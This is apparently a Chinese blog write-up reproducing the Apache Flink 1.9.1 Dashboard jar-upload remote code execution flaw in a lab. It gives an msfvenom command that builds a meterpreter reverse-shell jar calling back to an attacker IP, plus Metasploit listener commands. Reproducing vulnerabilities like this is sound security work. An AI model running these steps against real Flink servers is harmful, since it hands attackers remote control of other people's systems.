0x00 简介

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01 漏洞概述

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。

0x02 影响版本

至目前最新版本Apache Flink 1.9.1
漏洞危害: 高危

0x03 环境搭建

kali 192.168.115.43 受害机
win10 192.168.115.16 攻击者
测试环境:Flink 1.9.1 java8+
Apache Flink 1.9.1安装包下载

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

0x04 漏洞复现

1)tar -zxvf flink-1.9.1-bin-scala_2.11.tgz
2)到bin文件夹运行./start-cluster.sh


3)环境搭建成功 目标站点 http://127.0.0.1:8081

4)生成jar后门包
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.115.16 LPORT=2019 -f jar > sylon.jar

5)攻击机访问目标站点 并上传sylon.jar

6)配置监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 192.168.115.16
set LPORT 2019
show options
run

7)漏洞触发

0x05 修复方案

等待官网更新补丁或等待官网出最新版本后及时更新

0x06 参考文档

https://mp.weixin.qq.com/s/HTFDYWlXfYe7fyGNJVwpSw

最新文章

  1. AngularJs之九(ending......)
  2. IOS基础学习-2: UIButton
  3. Q的深层嵌套
  4. KVO
  5. 【转】NoSQL初探之人人都爱Redis:(2)Redis API与常用数据类型简介
  6. Oracle11g 统计信息——统计信息自动收集任务
  7. JSP内置对象---request和 response
  8. SpringMVC 使用Form标签库制作登录表单
  9. Codeforces Round #197 (Div. 2) C,D两题
  10. linux samba.tar.gz安装和配置
  11. jquery提示气泡
  12. javascript笔记09:javascript的下拉式导航菜单
  13. 我的前端之旅--SeaJs基础和spm编译工具运用[图文]
  14. Hive进阶(上)
  15. C语言老司机学Python (六)- 多线程
  16. redis过期机制(官网文档总结)
  17. 新的 Centos 服务器初始化配置
  18. 生命不息,折腾不止 ~ 旧PC改造之家庭影音
  19. 阿里云服务器 Mysql数据库的安装和使用
  20. The type javax.servlet.http.HttpServletRequest cannot be resolved. It is indirectly referenced from required .class files

热门文章

  1. java核心技术----接口
  2. caffe 指定GPU
  3. js - 构造函数-静态属性/方法-原型对象 - 前端第八课
  4. 检测并移除WMI持久化后门
  5. Golang设置https访问,以及http如何重定向到https
  6. C#在窗体中按下鼠标键拖动窗体
  7. Language Model
  8. rabbit MQ 消息队列
  9. Nginx 主要应用场景
  10. [Linux-CentOS7]yum清华源CentOS7